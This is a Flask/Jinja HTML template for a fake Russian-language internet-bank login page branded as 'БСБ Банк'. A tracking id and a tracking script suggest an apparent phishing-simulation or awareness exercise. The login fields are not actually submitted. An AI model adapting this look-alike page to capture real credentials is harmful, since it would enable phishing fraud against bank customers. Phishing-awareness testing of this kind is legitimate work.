<!DOCTYPE html>
<html lang="ru">

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Вход в интернет-банк</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='css/style_2.1.css') }}">

</head>

<body>
    <div class="background"></div>
    <div class="login-box">
        <div class="tabs">
            <button class="tab active">Вход</button>
            <button class="tab">Регистрация</button>
        </div>
        <h1>Интернет-банк для физических лиц</h1>
        <form action="/site_2.1" method="get">
            <input type="hidden" name="id" value="{{ request.args.get('id') }}">
            <label>Логин<span class="required">*</span></label>
            <input type="text" class="логин" required />

            <label>Пароль<span class="required">*</span></label>
            <input type="password" class="пароль" required />

            <a href="#" class="forgot">Забыли пароль?</a>

            <button type="submit" class="submit-btn">Войти</button>

            <p class="note">
                <span class="required">*</span> Вы можете использовать Ваш логин и пароль от <a href="#">мобильного
                    приложения «БСБ Банк»</a>
            </p>
        </form>
    </div>
    <script src="{{ url_for('static', filename='js/track_example_2.js') }}"></script>
</body>

</html>